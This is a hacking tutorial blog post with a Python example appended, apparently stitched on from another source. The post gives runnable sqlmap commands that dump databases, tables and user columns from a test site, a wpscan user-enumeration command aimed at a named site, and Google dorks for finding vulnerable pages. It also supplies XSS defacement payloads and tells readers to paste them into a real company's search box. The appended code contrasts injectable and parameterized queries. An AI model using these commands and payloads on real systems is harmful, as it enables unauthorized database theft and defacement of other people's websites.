A post to make you alive again, with some cool steps you can use to take a website down.
Disclaimer: This post is for practice purposes only. Using these tricks without proper consent is illegal and it's your responsibility to obey all the laws. We are not responsible for any misuse or damage caused by this tutorial.
Practice Web Site : testphp.vulnweb.com/listproducts.php?cat=1
Starting with scanning for vulnerability -
- Set up Kali Linux in a Partition or in Virtual Machine.
- Open up : Application > Kali Linux > Web Application > Web Vulnerability Scanner > VEGA
// I hope you didn't have a problem doing that.
- So, see step by step after opening VEGA tool
After opening it - Go To Scan > Start New Scan
Enter the web address. You can explore the further options if you like; otherwise just click on Finish.
Remember, you can search for vulnerabilities on any webpage or site. Some sites also award you a bounty for finding bugs and reporting them ;)
The scan will take place. You can see the hierarchy in website view.
Now, BOOOOMMMM...
You've got
XSS - 1
SQL - 1
Which we are going to use.
Information of WPSCAN :
Used to scan WordPress-hosted websites. Can be used to enumerate users or databases or tables:
wpscan --url www.cheaphai.com --enumerate u
You can explore more by using --help in wpscan.rb
Using SQLMAP to exploit a SQL Injection Vulnerable website
Opening a vulnerable website
http://testphp.vulnweb.com/listproducts.php?cat=1
doesn't create much of a problem and looks like yellow gold, but who knows,
a " ' " can turn that gold into shit. (both are yellow though)
So, you've identified, lamely, that it is a vulnerable site. Enough talk till here. Now time for some action:
Paste it in terminal
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
Here "--dbs" will enumerate the list of databases.
You can see the available databases in the last lines:
[1] acuart
[2] information_schema
let's check the tables in 'acuart' -
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
Whoa!!
That was quick.
Now think, how can you enumerate PASSWORDS ;)
Time for XSS : Cross Site Scripting :
Cross Site Scripting is nothing but a vulnerability which can cause some serious problems for a website, like:
So, that's an example.
If you know how to write JavaScript you can do anything with XSS.
Now, use Google Dorks by typing these in the search box:
inurl:item_id= | inurl:review.php?id=
inurl:newsid= | inurl:iniziativa.php?in=
inurl:trainers.php?id= | inurl:curriculum.php?id=
inurl:news-full.php?id= | inurl:labels.php?id=
inurl:news_display.php?getid= | inurl:story.php?id=
inurl:index2.php?option= | inurl:look.php?ID=
inurl:readnews.php?id= | inurl:newsone.php?id=
inurl:top10.php?cat= | inurl:aboutbook.php?id=
Literally, there are a lot of queries you can search.
So, go to these pages
http://testphp.vulnweb.com/search.php
http://www.chauvetlighting.com/
Write one of the scripts below in their search boxes and see the magic
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1>Tutorial by - CS BEANS</h1></div>";</script>
<script>document.body.innerHTML="<style>body{ background-image:url('http://www.connectedrogers.ca/wp-content/uploads/2013/11/DespicableMe.jpg');}</style>";</script>
For Bonus :
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
Open Paste bin here to get list of vulnerable website : http://pastebin.com/xd9Vxyn9
Now go and create your own script and check them out.
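Seen from the side of whoever has to fix the two findings VEGA reported (SQL injection in the cat parameter, XSS in the search box), both come down to untrusted input being pasted into SQL or HTML as-is. The block below is an added example, not code from this post or from the test site; it uses Python's sqlite3 in place of the site's real stack, and the table, column and function names are assumptions.

```python
import html
import sqlite3

def make_db():
    # Constructed sample data; the schema is an assumption, not the site's.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)",
                   [(1, 1, "poster"), (2, 1, "print"), (3, 2, "frame")])
    return db

def list_products_vulnerable(db, cat):
    # Vulnerable pattern: the cat parameter becomes part of the SQL text,
    # so a stray quote changes the statement itself.
    query = "SELECT name FROM products WHERE cat = " + cat + " ORDER BY id"
    return [row[0] for row in db.execute(query)]

def list_products_safe(db, cat):
    # Hardened: check the type first, then bind the value as a parameter
    # so it is never parsed as SQL.
    if not (cat.isascii() and cat.isdigit()):
        return []
    rows = db.execute(
        "SELECT name FROM products WHERE cat = ? ORDER BY id", (int(cat),))
    return [row[0] for row in rows]

def render_search_vulnerable(term):
    # Vulnerable pattern: the search term is echoed into the page as markup.
    return "<p>searched for: " + term + "</p>"

def render_search_safe(term):
    # Hardened: HTML-encode on output so the browser displays the text
    # instead of running it.
    return "<p>searched for: " + html.escape(term, quote=True) + "</p>"

def quote_probe_breaks_query(db):
    # The single-quote check from the post: the concatenated query raises
    # a SQL error, while the parameterized one simply returns no rows.
    try:
        list_products_vulnerable(db, "1'")
    except sqlite3.Error:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print(quote_probe_breaks_query(db), list_products_safe(db, "1'"))
    print(render_search_safe("<script>x</script>"))
```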